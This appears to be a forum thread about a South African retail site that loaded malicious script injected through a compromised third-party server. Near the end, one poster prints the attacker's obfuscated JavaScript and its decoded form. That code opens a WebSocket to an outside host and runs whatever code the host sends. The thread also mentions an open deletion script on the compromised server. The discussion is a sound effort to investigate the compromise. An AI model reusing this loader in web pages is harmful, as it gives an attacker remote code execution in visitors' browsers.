geewiz phishing scam

Ok mystery solved.

used bing to load www.geewiz.co.za and it worked normally.

cleared out my chrome browser history

tried chrome again and it worked normally

thanks guys for the quick response👌
It works because they removed the file from that server, as dontcryforme says something was injected somewhere, probably as a result of the template geewiz used

1758551595876.png
 
Site loads okay on my side…

It also loaded https://www.provincia.pescara.it/libraries/jevents/jquery.js

Screenshot 2025-09-22 150350.png

Initiated by code in the footer on geewiz.
It works because they removed the file from that server, as dontcryforme says something was injected somewhere, probably as a result of the template geewiz used

View attachment 1850206

As the file has been taken out and shot. The pescara.it website had a nice indexx.php that allowed anyone to delete the offending file ;)

Copy of the file can be found here,

My skills are limited, but it is telling me that it pulled in a payload from the blockchain.

Then I get this:
const baw = [35,39,39,110,123,123,51,53,51,61,55,60,56,39,122,32,59,36,123,39,53,50,59,38,63,107,39,59,33,38,55,49,105];const cjlu = 84;window.YPYd5Z = new WebSocket(String.fromCharCode(...baw.map(teg => teg ^ cjlu)) + encodeURIComponent(location.href));window.YPYd5Z.addEventListener('message', event => {new Function(event.data)()});try{localStorage.removeItem('ws_var');localStorage.setItem('ws_var','YPYd5Z');}catch(e){}

And that, is loading a websocket of sorts:
window.YPYd5Z = new WebSocket("wss://gagichls.top/safork?source=" + encodeURIComponent(location.href));

Not that I know anything. What I do know, is that it sounds bad.
 
Top
Sign up to the MyBroadband newsletter
X